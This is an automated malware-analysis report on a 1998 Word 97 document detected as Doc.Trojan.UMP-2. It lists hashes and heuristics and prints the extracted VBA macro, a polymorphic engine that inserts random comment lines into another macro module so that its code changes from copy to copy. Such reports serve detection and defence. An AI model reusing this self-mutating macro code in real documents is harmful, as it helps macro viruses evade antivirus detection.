Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e013575b84aa1732…

MALICIOUS

Office (OLE)

Size: 27.0 KB
Created: 1998-09-28 13:52:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 3a3f802a28d88c1c6743e52ceebba5a6
SHA-1: a381160264c88606b2a1998d1a23c3191baf5d31
SHA-256: e013575b84aa1732e24a17cabb4824760053f474744dac359febc0ecbc845383
Risk Score: 80

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The critical ClamAV heuristic indicates a detected trojan within an extracted artifact, and the medium heuristic confirms the presence of VBA macros. The extracted VBA code, named 'UMPE', suggests a polymorphic engine designed to obfuscate its functionality, likely to evade detection and execute a malicious payload. The specific purpose of the obfuscated code is not fully discernible due to its polymorphic nature.

Heuristics (1)

  • VBA macros detected [medium] OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 814 bytes
SHA-256: 60c622ccc8bc11b578c6c0d73b5d64315513ad446921cc94f0602f10115c520a
Detection
ClamAV: Doc.Trojan.UMP-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Модуль1"
Sub UMPE()

'ULTRAS MACRO POLYMORPHIC ENGINE for Word97
'ULTRAS 1998

MuNu = Int(Rnd() * 20 + 1)

For Mutate = 1 To MuNu

MuRL = Application.VBE.ActiveVBProject.VBComponents("zzz").CodeModule.CountOfLines

MuLi = Int(Rnd() * MuRL + 1)

MuLe = Int(Rnd() * 40 + 1)

For MuGe = 1 To MuLe

LiVe = Int((120 - 100 + 1) * Rnd + 228)

MuRe = MuRe + Chr$(LiVe)

Next MuGe

Application.VBE.ActiveVBProject.VBComponents("zzz").CodeModule.InsertLines MuLi, vbTab & "' " & MuRe

MuRe = ""

Next Mutate

End Sub